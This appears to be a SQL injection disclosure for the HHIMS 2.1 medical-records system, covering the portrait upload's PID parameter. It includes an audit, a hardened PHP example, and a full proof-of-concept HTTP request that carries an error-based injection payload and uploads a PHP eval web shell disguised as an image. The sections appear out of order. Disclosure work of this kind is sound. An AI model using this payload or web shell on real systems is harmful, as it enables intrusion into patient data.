HHIMS is a free and open-source software system used to store and retrieve simple patient medical records. The system was programmed by Lunar Technologies for the ICTA (Information and Communication Technology Agency of the Sri Lankan Government).
Each patient has a corresponding PID parameter. In the patient-portrait upload function, PID is a user-controllable variable that is passed into a database query without sanitization, which results in a SQL injection vulnerability.
The affected files are application/modules/attach/controllers/attach.php and application/models/persistent.php.
Code audit:
In the attach controller, lines 51-99, the save_portrait function uploads and saves pictures. The parameters sent by the front end via POST are x, y, w, h and the variable PID.
At line 58 it calls into the persistence layer (application/models/persistent.php), where these variables are passed into the database query without any filtering.
The SQL injection point is shown in the figure below.
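The pattern described above, as an added illustration rather than HHIMS's own code (which is only shown in the figure): a reconstruction of an unfiltered query beside a hardened version that validates PID as an integer at the controller boundary and binds it in a prepared statement. The table and column names, the function names, and the use of PDO (instead of whatever database layer HHIMS uses) are assumptions.

```php
<?php
// Added example, not HHIMS code. Table/column names are assumptions.
// Assumes the PDO handle was opened with PDO::ERRMODE_EXCEPTION.

// VULNERABLE pattern: the request parameter is concatenated straight into the
// SQL string, so a PID containing a quote changes the structure of the query
// instead of being treated as data.
function get_patient_vulnerable(PDO $db, string $pid): ?array
{
    $sql = 'SELECT * FROM patient WHERE PID = "' . $pid . '"';
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// HARDENED: (1) validate the type where the input enters the controller: a
// patient id is a positive integer, so anything else is rejected before it
// reaches the model; (2) use a prepared statement with a typed bound value so
// the database never parses the value as SQL.
function validate_pid($raw): int
{
    // FILTER_VALIDATE_INT rejects quotes, spaces, comments and any other
    // non-numeric content; min_range excludes 0 and negatives.
    $pid = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($pid === false) {
        throw new InvalidArgumentException('PID must be a positive integer');
    }
    return $pid;
}

function get_patient_safe(PDO $db, int $pid): ?array
{
    $stmt = $db->prepare('SELECT * FROM patient WHERE PID = :pid');
    $stmt->bindValue(':pid', $pid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Controller boundary, as it would sit in a save_portrait handler (hypothetical
// name): fail closed with a 400 on malformed input rather than pass it on.
function handle_save_portrait(PDO $db, array $post): string
{
    try {
        $pid = validate_pid($post['PID'] ?? '');
    } catch (InvalidArgumentException $e) {
        http_response_code(400);
        return 'Invalid PID';
    }
    $patient = get_patient_safe($db, $pid);
    return $patient === null ? 'Patient not found' : 'OK';
}
```

The integer check alone already blocks the string payload shown in the POC below; the prepared statement is the defence that still holds if a future parameter is legitimately a string.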
2. Validation with sqlmap
Boolean-based blind injection
Error-based injection
3. Manual SQL injection proof
Manual verification
Burp Suite verification
4. SQL injection POC
POST /index.php/attach/save_portrait HTTP/1.1
Host: hhims.test
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 1098
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=070ee21ecab6d192870d6a7732a9ebbdfb7d406e2ea2c406bce162631f75
Cookie: PHPSESSID=ha23p18u46aqdcofn4hr2ae783; ci_session=a%3A18%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%226d0686706e577604e98e7b88dbf0ce0f%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A111%3A%22Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F107.0.0.0+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1668046818%3Bs%3A3%3A%22UID%22%3Bs%3A1%3A%221%22%3Bs%3A3%3A%22HID%22%3Bs%3A1%3A%221%22%3Bs%3A21%3A%22last_prescription_cmd%22%3Bs%3A7%3A%22by_name%22%3Bs%3A5%3A%22Title%22%3Bs%3A3%3A%22Mr.%22%3Bs%3A9%3A%22FirstName%22%3Bs%3A16%3A%22Thurairajasingam%22%3Bs%3A4%3A%22Post%22%3Bs%3A14%3A%22Lab+Technician%22%3Bs%3A8%3A%22UserName%22%3Bs%3A4%3A%22demo%22%3Bs%3A8%3A%22FullName%22%3Bs%3A33%3A%22Mr.+Thurairajasingam+SENTHILRUBAN%22%3Bs%3A9%3A%22UserGroup%22%3Bs%3A10%3A%22Programmer%22%3Bs%3A8%3A%22Hospital%22%3Bs%3A15%3A%22Kalutara+Server%22%3Bs%3A15%3A%22DefaultLanguage%22%3Bs%3A7%3A%22English%22%3Bs%3A13%3A%22hospital_info%22%3Ba%3A31%3A%7Bs%3A3%3A%22HID%22%3Bs%3A1%3A%221%22%3Bs%3A4%3A%22Name%22%3Bs%3A15%3A%22Kalutara+Server%22%3Bs%3A10%3A%22Telephone1%22%3Bs%3A7%3A%221234566%22%3Bs%3A10%3A%22Telephone2%22%3Bs%3A0%3A%22%22%3Bs%3A14%3A%22Address_Street%22%3Bs%3A14%3A%22No+2+Lake+Road%22%3Bs%3A15%3A%22Address_Village%22%3Bs%3A13%3A%22Gamagoda+West%22%3Bs%3A18%3A%22Address_DSDivision%22%3Bs%3A9%3A%22Dodangoda%22%3Bs%3A16%3A%22Address_District%22%3Bs%3A8%3A%22Kalutara%22%3Bs%3A15%3A%22Address_Country%22%3Bs%3A0%3A%22%22%3Bs%3A11%3A%22Address_ZIP%22%3Bs%3A1%3A%220%22%3Bs%3A10%3A%22CreateDate%22%3Bs%3A19%3A%220000-00-00+00%3A00%3A00%22%3Bs%3A10%3A%22CreateUser%22%3Bs%3A0%3A%22%22%3Bs%3A10%3A%22LastUpDate%22%3Bs%3A19%3A%222015-08-13+20%3A32%3A57%22%3Bs%3A14%3A%22LastUpDateUser%22%3Bs%3A33%3A%22Mr.+Thurairajasingam+SENTHILRUBAN%22%3Bs%3A6%3A%22Active%22%3Bs%3A1%3A%221%22%3Bs%3A4%3A%22Code%22%3Bs%3A4%3A%220001%22%3Bs%3A4%3A%22Type%22%3Bs%3A3%3A%22PBH%22%3Bs%3A11%3A%22Curren
t_BHT%22%3Bs%3A8%3A%222015%2F2%2F2%22%3Bs%3A18%3A%22Display_Drug_Count%22%3Bs%3A1%3A%221%22%3Bs%3A23%3A%22Display_Zero_Drug_Count%22%3Bs%3A1%3A%221%22%3Bs%3A19%3A%22Dispense_Drug_Count%22%3Bs%3A1%3A%221%22%3Bs%3A21%3A%22Display_Previous_Drug%22%3Bs%3A1%3A%221%22%3Bs%3A18%3A%22Use_One_Field_Name%22%3Bs%3A1%3A%220%22%3Bs%3A16%3A%22Use_Calendar_DOB%22%3Bs%3A1%3A%221%22%3Bs%3A18%3A%22Instant_Validation%22%3Bs%3A1%3A%221%22%3Bs%3A21%3A%22Number_NIC_Validation%22%3Bs%3A1%3A%220%22%3Bs%3A8%3A%22LIC_Info%22%3Bs%3A149%3A%22HOSPITAL+NAME%3DKalutara+ServernHOSPITAL+Key%3Dca9792275c984972591f9d949cd7a4c85e04facfnBARCODE%3DYesnAPPOINTMENTSYSTEM%3DYesnAUTOANALIZER%3DYesnATTACHFILE%3DYes%22%3Bs%3A15%3A%22Visit_ICD_Field%22%3Bs%3A1%3A%220%22%3Bs%3A16%3A%22occupation_field%22%3Bs%3A1%3A%220%22%3Bs%3A18%3A%22Visit_SNOMED_Field%22%3Bs%3A1%3A%220%22%3Bs%3A17%3A%22Token_Footer_Text%22%3Bs%3A44%3A%22Appointment+system+programmed+by+Lunar+Tech.%22%3B%7Ds%3A10%3A%22reset_suer%22%3Bs%3A1%3A%223%22%3Bs%3A3%3A%22mid%22%3Bs%3A1%3A%224%22%3B%7D105940c11bc7b0aeafafcc429005fe67
Origin: http://hhims.test
Referer: http://hhims.test/index.php/attach/portrait/1
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip
--070ee21ecab6d192870d6a7732a9ebbdfb7d406e2ea2c406bce162631f75
Content-Disposition: form-data; name="w"
Content-Type: form-data
--070ee21ecab6d192870d6a7732a9ebbdfb7d406e2ea2c406bce162631f75
Content-Disposition: form-data; name="h"
Content-Type: form-data
--070ee21ecab6d192870d6a7732a9ebbdfb7d406e2ea2c406bce162631f75
Content-Disposition: form-data; name="PID"
Content-Type: form-data
1" AND ROW(1,2)>(SELECT COUNT(*),CONCAT((SELECT USER()),FLOOR(RAND(0)*2))x FROM (SELECT 6927 UNION SELECT 9908 UNION SELECT 1 UNION SELECT 2)a GROUP BY x) AND "ace"="ace
--070ee21ecab6d192870d6a7732a9ebbdfb7d406e2ea2c406bce162631f75
Content-Disposition: form-data; name="image"; filename="ace.jpg"
Content-Type: form-data
<?php eval(@$_POST['ace']);?>
--070ee21ecab6d192870d6a7732a9ebbdfb7d406e2ea2c406bce162631f75
Content-Disposition: form-data; name="x"
Content-Type: form-data
--070ee21ecab6d192870d6a7732a9ebbdfb7d406e2ea2c406bce162631f75
Content-Disposition: form-data; name="y"
Content-Type: form-data
--070ee21ecab6d192870d6a7732a9ebbdfb7d406e2ea2c406bce162631f75--
1. SQL injection vulnerability in HHIMS V2.1 (patient medical record system)
System version: 2.1
Vulnerability URL: http://hhims.test/index.php/attach/portrait/1
Build environment: Apache 2.4.39; MySQL 5.0.96; PHP 5.6.9